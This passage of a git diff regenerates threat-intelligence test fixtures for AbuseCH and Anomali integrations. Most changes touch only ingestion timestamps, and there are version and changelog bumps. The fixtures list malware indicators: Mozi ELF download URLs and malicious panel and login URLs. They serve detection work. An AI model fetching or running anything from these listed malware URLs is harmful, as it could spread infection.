listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30953,7 +30953,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029300100Z", + "ingested": "2021-12-14T14:56:15.726662060Z", "original": "{\"id\":\"960913\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960913/\",\"url\":\"http://89.160.20.156:35523/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31002,7 +31002,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029306800Z", + "ingested": "2021-12-14T14:56:15.726662445Z", "original": "{\"id\":\"960910\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960910/\",\"url\":\"http://89.160.20.156:47418/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -31051,7 +31051,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029313500Z", + "ingested": "2021-12-14T14:56:15.726662808Z", "original": "{\"id\":\"960908\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960908/\",\"url\":\"http://89.160.20.156:53007/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31100,7 +31100,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029320200Z", + "ingested": "2021-12-14T14:56:15.726663173Z", "original": "{\"id\":\"960909\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960909/\",\"url\":\"http://89.160.20.156:38089/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31149,7 +31149,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029327Z", + "ingested": "2021-12-14T14:56:15.726663535Z", "original": "{\"id\":\"960904\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960904/\",\"url\":\"http://89.160.20.156:35243/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31198,7 +31198,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029333600Z", + "ingested": "2021-12-14T14:56:15.726663919Z", "original": "{\"id\":\"960905\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960905/\",\"url\":\"http://89.160.20.156:50589/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31247,7 +31247,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029340100Z", + "ingested": "2021-12-14T14:56:15.726664315Z", "original": "{\"id\":\"960906\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960906/\",\"url\":\"http://89.160.20.156:42479/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31296,7 +31296,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029346700Z", + "ingested": "2021-12-14T14:56:15.726664683Z", "original": "{\"id\":\"960907\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960907/\",\"url\":\"http://89.160.20.156:43425/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31345,7 +31345,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029353200Z", + "ingested": "2021-12-14T14:56:15.726665048Z", "original": "{\"id\":\"960903\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960903/\",\"url\":\"http://89.160.20.156:35013/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:36:28 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31394,7 +31394,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029359800Z", + "ingested": "2021-12-14T14:56:15.726665429Z", "original": "{\"id\":\"960902\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960902/\",\"url\":\"http://89.160.20.156:35298/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31443,7 +31443,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029366400Z", + "ingested": "2021-12-14T14:56:15.726665801Z", "original": "{\"id\":\"960900\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960900/\",\"url\":\"http://89.160.20.156:54174/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31492,7 +31492,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029373100Z", + "ingested": "2021-12-14T14:56:15.726666183Z", "original": "{\"id\":\"960901\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960901/\",\"url\":\"http://89.160.20.156:42768/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31541,7 +31541,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029379700Z", + "ingested": "2021-12-14T14:56:15.726666540Z", "original": "{\"id\":\"960898\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960898/\",\"url\":\"http://89.160.20.156:59110/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31590,7 +31590,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029386400Z", + "ingested": "2021-12-14T14:56:15.726666905Z", "original": "{\"id\":\"960899\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960899/\",\"url\":\"http://89.160.20.156:51476/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31639,7 +31639,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029392900Z", + "ingested": "2021-12-14T14:56:15.726667292Z", "original": "{\"id\":\"960897\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960897/\",\"url\":\"http://89.160.20.156:58839/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31688,7 +31688,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029399500Z", + "ingested": "2021-12-14T14:56:15.726667654Z", "original": "{\"id\":\"960894\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960894/\",\"url\":\"http://89.160.20.156:50249/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31737,7 +31737,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029406Z", + "ingested": "2021-12-14T14:56:15.726668016Z", "original": "{\"id\":\"960895\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960895/\",\"url\":\"http://89.160.20.156:46173/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31786,7 +31786,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029412600Z", + "ingested": "2021-12-14T14:56:15.726668388Z", "original": "{\"id\":\"960896\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960896/\",\"url\":\"http://89.160.20.156:43785/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31835,7 +31835,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029419100Z", + "ingested": "2021-12-14T14:56:15.726668759Z", "original": "{\"id\":\"960893\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960893/\",\"url\":\"http://89.160.20.156:46924/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31884,7 +31884,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029425700Z", + "ingested": "2021-12-14T14:56:15.726669160Z", "original": "{\"id\":\"960892\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960892/\",\"url\":\"http://89.160.20.156:59734/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31933,7 +31933,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029432400Z", + "ingested": "2021-12-14T14:56:15.726669519Z", "original": "{\"id\":\"960889\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960889/\",\"url\":\"http://89.160.20.156:51620/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31982,7 +31982,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029439Z", + "ingested": "2021-12-14T14:56:15.726669888Z", "original": "{\"id\":\"960890\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960890/\",\"url\":\"http://89.160.20.156:42585/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -32031,7 +32031,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029445600Z", + "ingested": "2021-12-14T14:56:15.726670256Z", "original": "{\"id\":\"960891\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960891/\",\"url\":\"http://89.160.20.156:57941/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -32080,7 +32080,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029452200Z", + "ingested": "2021-12-14T14:56:15.726670677Z", "original": "{\"id\":\"960888\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960888/\",\"url\":\"http://89.160.20.156:38308/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:32:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -32129,7 +32129,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029458800Z", + "ingested": "2021-12-14T14:56:15.726671043Z", "original": "{\"id\":\"960887\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960887/\",\"url\":\"http://89.160.20.156:55281/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:44 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -32178,7 +32178,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029465800Z", + "ingested": "2021-12-14T14:56:15.726671420Z", "original": "{\"id\":\"960886\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960886/\",\"url\":\"http://89.160.20.156:57662/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -32227,7 +32227,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029472300Z", + "ingested": "2021-12-14T14:56:15.726671794Z", "original": "{\"id\":\"960885\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960885/\",\"url\":\"http://89.160.20.156:40738/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -32276,7 +32276,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029478900Z", + "ingested": "2021-12-14T14:56:15.726672173Z", "original": "{\"id\":\"960884\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960884/\",\"url\":\"http://89.160.20.156:59018/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -32325,7 +32325,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029487Z", + "ingested": "2021-12-14T14:56:15.726672541Z", "original": "{\"id\":\"960880\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960880/\",\"url\":\"http://89.160.20.156:60279/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -32374,7 +32374,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029494Z", + "ingested": "2021-12-14T14:56:15.726672908Z", "original": "{\"id\":\"960881\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960881/\",\"url\":\"http://89.160.20.156:52738/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -32423,7 +32423,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029500500Z", + "ingested": "2021-12-14T14:56:15.726673273Z", "original": "{\"id\":\"960882\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960882/\",\"url\":\"http://89.160.20.156:37394/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -32472,7 +32472,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029507100Z", + "ingested": "2021-12-14T14:56:15.726673639Z", "original": "{\"id\":\"960883\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960883/\",\"url\":\"http://89.160.20.156:56491/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -32521,7 +32521,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029513800Z", + "ingested": "2021-12-14T14:56:15.726673999Z", "original": "{\"id\":\"960879\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960879/\",\"url\":\"http://89.160.20.156:46067/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:20:19 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", diff --git a/packages/ti_abusech/manifest.yml b/packages/ti_abusech/manifest.yml index 93d532f07db..2bc81339ff4 100644 --- a/packages/ti_abusech/manifest.yml +++ b/packages/ti_abusech/manifest.yml @@ -1,6 +1,6 @@ name: ti_abusech title: AbuseCH -version: 1.1.3 +version: 1.1.4 release: ga description: Collect threat intelligence from AbuseCH API with Elastic Agent. type: integration diff --git a/packages/ti_anomali/changelog.yml b/packages/ti_anomali/changelog.yml index d1843399aea..272074e86d2 100644 --- a/packages/ti_anomali/changelog.yml +++ b/packages/ti_anomali/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.3" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.1.2" changes: - description: Change test public IPs to the supported subset diff --git a/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log-expected.json b/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log-expected.json index 123f0a43007..aa6eb8ca2fc 100644 --- a/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log-expected.json +++ b/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log-expected.json @@ -39,7 +39,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022544100Z", + "ingested": "2021-12-14T14:57:43.118149300Z", "original": "{\"created\":\"2020-01-22T02:58:57.431Z\",\"description\":\"TS ID: 55241332361; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--44c85d4f-45ca-4977-b693-c810bbfb7a28\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T02:58:57.431Z\",\"name\":\"mal_url: http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:57.431Z\"}", "category": "threat", "type": "indicator", @@ -91,7 +91,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022557600Z", + "ingested": "2021-12-14T14:57:43.118152580Z", "original": "{\"created\":\"2020-01-22T02:58:57.503Z\",\"description\":\"TS ID: 55241332307; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--f9fe5c81-6869-4247-af81-62b7c8aba209\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-22T02:58:57.503Z\",\"name\":\"mal_url: http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:57.503Z\"}", "category": "threat", "type": "indicator", @@ -142,7 +142,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022562300Z", + "ingested": "2021-12-14T14:57:43.118153162Z", "original": "{\"created\":\"2020-01-22T02:58:57.57Z\",\"description\":\"TS ID: 55241332302; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--b0e14122-9005-4776-99fc-00872476c6d1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-01-22T02:58:57.57Z\",\"name\":\"mal_url: http://f0387770.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387770.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:57.57Z\"}", "category": "threat", "type": "indicator", @@ -193,7 +193,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022569300Z", + "ingested": "2021-12-14T14:57:43.118153700Z", "original": "{\"created\":\"2020-01-22T02:58:59.366Z\",\"description\":\"TS ID: 55241332312; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime\",\"id\":\"indicator--111ec76f-616d-4aa8-80fd-e11ef0066aba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-50\"],\"modified\":\"2020-01-22T02:58:59.366Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:59.366Z\"}", "category": "threat", "type": "indicator", @@ -245,7 +245,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022574800Z", + "ingested": "2021-12-14T14:57:43.118154276Z", "original": "{\"created\":\"2020-01-22T02:58:59.457Z\",\"description\":\"TS ID: 55241332386; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--189ce776-6d7e-4e85-9222-de5876644988\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-01-22T02:58:59.457Z\",\"name\":\"mal_url: http://appareluea.com/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://appareluea.com/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:59.457Z\"}", "category": "threat", "type": "indicator", @@ -297,7 +297,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022580800Z", + "ingested": "2021-12-14T14:57:43.118154719Z", "original": "{\"created\":\"2020-01-22T02:59:06.402Z\",\"description\":\"TS ID: 55241332391; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--a4144d34-b86d-475e-8047-eb46b48ee325\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-22T02:59:06.402Z\",\"name\":\"mal_url: http://nkpotu.xyz/Kpot3/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nkpotu.xyz/Kpot3/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:06.402Z\"}", "category": "threat", "type": "indicator", @@ -342,7 +342,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022585800Z", + "ingested": "2021-12-14T14:57:43.118155165Z", "original": "{\"created\":\"2020-01-22T02:59:19.99Z\",\"description\":\"TS ID: 55241332372; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--983d9c3d-b7f8-4345-b643-b1d18e6ac6b2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-49\"],\"modified\":\"2020-01-22T02:59:19.99Z\",\"name\":\"mal_ip: 